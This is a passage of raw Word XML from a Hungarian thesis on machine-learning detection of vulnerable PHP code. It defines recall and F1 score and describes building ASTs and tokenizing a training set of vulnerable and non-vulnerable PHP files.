      <w:r w:rsidR="00396FBE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DA6534">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>ha a program nem sérülékenynek címkézi azt a kódot, ami egyébként az.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED2F04E" w14:textId="11FD637F" w:rsidR="001D610C" w:rsidRDefault="001118F7" w:rsidP="00F2654E">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>Kiszámítása</w:t>
      </w:r>
      <w:r w:rsidR="002179D7" w:rsidRPr="002179D7">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <m:oMath>
        <m:f>
          <m:fPr>
            <m:ctrlPr>
              <w:rPr>
                <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                <w:i/>
                <w:lang w:val="hu-HU"/>
              </w:rPr>
            </m:ctrlPr>
          </m:fPr>
          <m:num>
            <m:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                <w:lang w:val="hu-HU"/>
              </w:rPr>
              <m:t>TP</m:t>
            </m:r>
          </m:num>
          <m:den>
            <m:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                <w:lang w:val="hu-HU"/>
              </w:rPr>
              <m:t>TP+FN</m:t>
            </m:r>
          </m:den>
        </m:f>
      </m:oMath>
      <w:r>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="002179D7" w:rsidRPr="002179D7">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> képlettel </w:t>
      </w:r>
      <w:r w:rsidR="007930D6">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>történik.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79316280" w14:textId="769CCBD9" w:rsidR="00C55163" w:rsidRDefault="00C55163" w:rsidP="00C55163">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78452DB4" w14:textId="2A61ACC1" w:rsidR="00C55163" w:rsidRPr="00C55163" w:rsidRDefault="00C55163" w:rsidP="00C55163">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C55163">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>F-1 score</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79343977" w14:textId="77777777" w:rsidR="00C55163" w:rsidRDefault="00C55163" w:rsidP="00C55163">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1280F339" w14:textId="77777777" w:rsidR="00F2654E" w:rsidRDefault="002621EA" w:rsidP="00B74CE8">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002621EA">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">Az F1 pontszám a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="002621EA">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">recision </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>és a</w:t>
      </w:r>
      <w:r w:rsidRPr="002621EA">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidRPr="002621EA">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">ecall </w:t>
      </w:r>
      <w:r w:rsidR="00EA5902">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>harmonikus</w:t>
      </w:r>
      <w:r w:rsidRPr="002621EA">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> átlaga</w:t>
      </w:r>
      <w:r w:rsidR="00C24121">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>, e</w:t>
      </w:r>
      <w:r w:rsidRPr="002621EA">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>zért ez a pontszám a hamis pozitív</w:t>
      </w:r>
      <w:r w:rsidR="004F46E7">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>o</w:t>
      </w:r>
      <w:r w:rsidRPr="002621EA">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>kat és a hamis negatívokat egyaránt figyelembe veszi</w:t>
      </w:r>
      <w:r w:rsidR="004F46E7">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">, valamint </w:t>
      </w:r>
      <w:r w:rsidR="004F46E7" w:rsidRPr="004F46E7">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>sokkal nagyobb súlyt ad az alacsony értékeknek</w:t>
      </w:r>
      <w:r w:rsidR="004F46E7">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00C85157">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C85157" w:rsidRPr="00C85157">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">Ennek eredményeként az osztályozó csak akkor kap magas F-1 pontszámot, ha mind a </w:t>
      </w:r>
      <w:r w:rsidR="00A80378">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>Recall</w:t>
      </w:r>
      <w:r w:rsidR="00C85157" w:rsidRPr="00C85157">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">, mind a </w:t>
      </w:r>
      <w:r w:rsidR="00A80378">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>Precision</w:t>
      </w:r>
      <w:r w:rsidR="00C85157" w:rsidRPr="00C85157">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> magas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0591142D" w14:textId="7A4A613A" w:rsidR="00274590" w:rsidRDefault="00C85157" w:rsidP="00F2654E">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>Kiszámítása a</w:t>
      </w:r>
      <m:oMath>
        <m:r>
          <w:rPr>
            <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
            <w:lang w:val="hu-HU"/>
          </w:rPr>
          <m:t xml:space="preserve"> 2*</m:t>
        </m:r>
        <m:f>
          <m:fPr>
            <m:ctrlPr>
              <w:rPr>
                <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                <w:i/>
                <w:lang w:val="hu-HU"/>
              </w:rPr>
            </m:ctrlPr>
          </m:fPr>
          <m:num>
            <m:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                <w:lang w:val="hu-HU"/>
              </w:rPr>
              <m:t>precision*recall</m:t>
            </m:r>
          </m:num>
          <m:den>
            <m:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                <w:lang w:val="hu-HU"/>
              </w:rPr>
              <m:t>precision+recall</m:t>
            </m:r>
          </m:den>
        </m:f>
      </m:oMath>
      <w:r>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> képlettel történik.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DCFD771" w14:textId="22618E70" w:rsidR="000E59BD" w:rsidRPr="00D47FAE" w:rsidRDefault="000E59BD" w:rsidP="000E59BD">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C88AAF" w14:textId="77777777" w:rsidR="000E59BD" w:rsidRPr="00D47FAE" w:rsidRDefault="000E59BD" w:rsidP="000E59BD">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C9C216E" w14:textId="79E2A0CE" w:rsidR="004D1468" w:rsidRPr="00D47FAE" w:rsidRDefault="00C35889" w:rsidP="00484343">
      <w:pPr>
        <w:pStyle w:val="Stlus1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:ind w:left="284" w:hanging="284"/>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="_Toc71471977"/>
      <w:r w:rsidRPr="00D47FAE">
        <w:t>PROGRAM FELÉPÍTÉSE</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:p w14:paraId="694AC11C" w14:textId="77777777" w:rsidR="00704C4F" w:rsidRDefault="00704C4F" w:rsidP="00704C4F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A72E521" w14:textId="1C08F2E3" w:rsidR="00B47175" w:rsidRDefault="00665C88" w:rsidP="00A231C1">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">Ebben a fejezetben </w:t>
      </w:r>
      <w:r w:rsidR="00ED6B67">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>ismertetem</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> a </w:t>
      </w:r>
      <w:r w:rsidR="00512E76">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>program</w:t>
      </w:r>
      <w:r w:rsidR="00CF218C">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> felépítésének lépéseit</w:t>
      </w:r>
      <w:r w:rsidR="00611E2C">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> a korábbi fejezetet alapul véve</w:t>
      </w:r>
      <w:r w:rsidR="00E24DF3">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00A74879">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007F13C2">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">A 2.1-es fejezet felsorolásának legelső lépésével </w:t>
      </w:r>
      <w:r w:rsidR="00551260">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>kezdnem</w:t>
      </w:r>
      <w:r w:rsidR="007F13C2">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>, az adatgyűjtéssel.</w:t>
      </w:r>
      <w:r w:rsidR="008F315B">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B504CD">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">A 102 darab tanuló kód, amely a </w:t>
      </w:r>
      <w:r w:rsidR="00B504CD" w:rsidRPr="00062284">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>tanulo_adatok</w:t>
      </w:r>
      <w:r w:rsidR="00B504CD">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> mappában helyezkedik el</w:t>
      </w:r>
      <w:r w:rsidR="00AF2A0C">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00B504CD">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> a gépi tanulási modellem alapja.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="357C94AA" w14:textId="77777777" w:rsidR="00B47175" w:rsidRDefault="00B47175" w:rsidP="00B47175">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C003F8F" w14:textId="534FF536" w:rsidR="00B47175" w:rsidRDefault="00B47175" w:rsidP="00B47175">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B47175">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3D7EF8D3" wp14:editId="4B1C992F">
            <wp:extent cx="3194214" cy="482625"/>
            <wp:effectExtent l="0" t="0" r="635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4214" cy="482625"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="255F6147" w14:textId="29BDC374" w:rsidR="00B47175" w:rsidRDefault="00E533E9" w:rsidP="00E533E9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r w:rsidR="001B3B5F">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">-es ábra: </w:t>
      </w:r>
      <w:r w:rsidR="009D46BD" w:rsidRPr="00062284">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>pdo1.php</w:t>
      </w:r>
      <w:r w:rsidR="002B7BE3" w:rsidRPr="00062284">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>, egy</w:t>
      </w:r>
      <w:r w:rsidR="002B7BE3">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> nem sérülékeny kód</w:t>
      </w:r>
      <w:r w:rsidR="00062284">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> a tanulo_adatok mappában</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D9011F" w14:textId="77777777" w:rsidR="00B47175" w:rsidRDefault="00B47175" w:rsidP="00B47175">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DB5277A" w14:textId="47C383CA" w:rsidR="00493B74" w:rsidRDefault="00726BC7" w:rsidP="000E2CAE">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>Az</w:t>
      </w:r>
      <w:r w:rsidR="00B504CD">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> 57 darab sérülékeny és 45 darab nem sérülékeny kó</w:t>
      </w:r>
      <w:r w:rsidR="00E701D3">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidR="004F0C48">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> legelső lépésben </w:t>
      </w:r>
      <w:r w:rsidR="00487182">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">AST generáláson esik át, amihez az irodalomjegyzék [10] elemét használtam. </w:t>
      </w:r>
      <w:r w:rsidR="00C84AAF">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">Ez egy manuális folyamat volt, de </w:t>
      </w:r>
      <w:r w:rsidR="00C84AAF" w:rsidRPr="00BF5039">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">a parser.js a </w:t>
      </w:r>
      <w:r w:rsidR="00EE35D5">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>front-end</w:t>
      </w:r>
      <w:r w:rsidR="00C84AAF" w:rsidRPr="00BF5039">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> által bekért kódra</w:t>
      </w:r>
      <w:r w:rsidR="00B56B06" w:rsidRPr="00BF5039">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> ezt</w:t>
      </w:r>
      <w:r w:rsidR="00C84AAF" w:rsidRPr="00BF5039">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> már automatizálja</w:t>
      </w:r>
      <w:r w:rsidR="00956168" w:rsidRPr="00BF5039">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> az irodalomjegyzék [11] eleme segítségével</w:t>
      </w:r>
      <w:r w:rsidR="00C84AAF" w:rsidRPr="00BF5039">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00AF5286" w:rsidRPr="00BF5039">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>A PHP fájl</w:t>
      </w:r>
      <w:r w:rsidR="000E2045" w:rsidRPr="00BF5039">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">okhoz generált </w:t>
      </w:r>
      <w:r w:rsidR="00D203AD" w:rsidRPr="00BF5039">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>AST fák</w:t>
      </w:r>
      <w:r w:rsidR="00AF5286" w:rsidRPr="00BF5039">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> a</w:t>
      </w:r>
      <w:r w:rsidR="00BF5039" w:rsidRPr="00BF5039">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">z </w:t>
      </w:r>
      <w:r w:rsidR="00AF5286" w:rsidRPr="00BF5039">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>AST</w:t>
      </w:r>
      <w:r w:rsidR="00AF5286">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> mappábában </w:t>
      </w:r>
      <w:r w:rsidR="00964197">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">közel </w:t>
      </w:r>
      <w:r w:rsidR="00AF5286">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>azonos névvel helyezked</w:t>
      </w:r>
      <w:r w:rsidR="00ED4893">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">nek </w:t>
      </w:r>
      <w:r w:rsidR="00AF5286">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>el</w:t>
      </w:r>
      <w:r w:rsidR="00D9077D">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00470413">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00D9077D">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>txt kiterjesztéssel.</w:t>
      </w:r>
      <w:r w:rsidR="00A231C1">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B20B54" w14:textId="29698A8E" w:rsidR="00192E1F" w:rsidRDefault="00192E1F" w:rsidP="00B827B0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50F538C9" w14:textId="270AE4A0" w:rsidR="00192E1F" w:rsidRDefault="00B827B0" w:rsidP="00520418">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B827B0">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="67F1A32B" wp14:editId="3C0D88AE">
            <wp:extent cx="3791145" cy="184794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1145" cy="1847945"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A24A5A" w14:textId="3EB988FD" w:rsidR="00B827B0" w:rsidRDefault="008D169A" w:rsidP="00B827B0">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r w:rsidR="001B3B5F">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">-es </w:t>
      </w:r>
      <w:r w:rsidRPr="00103864">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>ábra: pdo1_ast.txt</w:t>
      </w:r>
      <w:r w:rsidR="00D51E6D" w:rsidRPr="00103864">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00B248A4" w:rsidRPr="00103864">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="00B248A4">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3.1-es ábra kódjának AST megfelelője</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D7239FB" w14:textId="77777777" w:rsidR="00192E1F" w:rsidRDefault="00192E1F" w:rsidP="00B827B0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="703A099C" w14:textId="7D0B1AC2" w:rsidR="0077502E" w:rsidRDefault="006C2942" w:rsidP="00493B74">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00103864">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:r w:rsidR="00DD18D9">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>tokenizer</w:t>
      </w:r>
      <w:r w:rsidRPr="00103864">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">.py </w:t>
      </w:r>
      <w:r w:rsidR="00A231C1" w:rsidRPr="00103864">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>ezekkel dolgozik tovább</w:t>
      </w:r>
      <w:r w:rsidR="00FC72D1" w:rsidRPr="00103864">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">. Elsőként listázza és egy ciklussal sorra </w:t>
      </w:r>
      <w:r w:rsidR="00DD32A8" w:rsidRPr="00103864">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">beolvassa </w:t>
      </w:r>
      <w:r w:rsidR="00650250" w:rsidRPr="00103864">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="00103864" w:rsidRPr="00103864">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">z </w:t>
      </w:r>
      <w:r w:rsidR="00D2759A" w:rsidRPr="00103864">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>AST mappa</w:t>
      </w:r>
      <w:r w:rsidR="00D2759A">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> .txt kiterjesztésű fájljait</w:t>
      </w:r>
      <w:r w:rsidR="00305DF5">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>. M</w:t>
      </w:r>
      <w:r w:rsidR="00CC4ACD">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">ajd </w:t>
      </w:r>
      <w:r w:rsidR="000F3794">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>ezek</w:t>
      </w:r>
      <w:r w:rsidR="00462A5D">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>nek</w:t>
      </w:r>
      <w:r w:rsidR="001F1CD6">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> a</w:t>
      </w:r>
      <w:r w:rsidR="00266A05">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> fájlok</w:t>
      </w:r>
      <w:r w:rsidR="00462A5D">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>nak a</w:t>
      </w:r>
      <w:r w:rsidR="00266A05">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
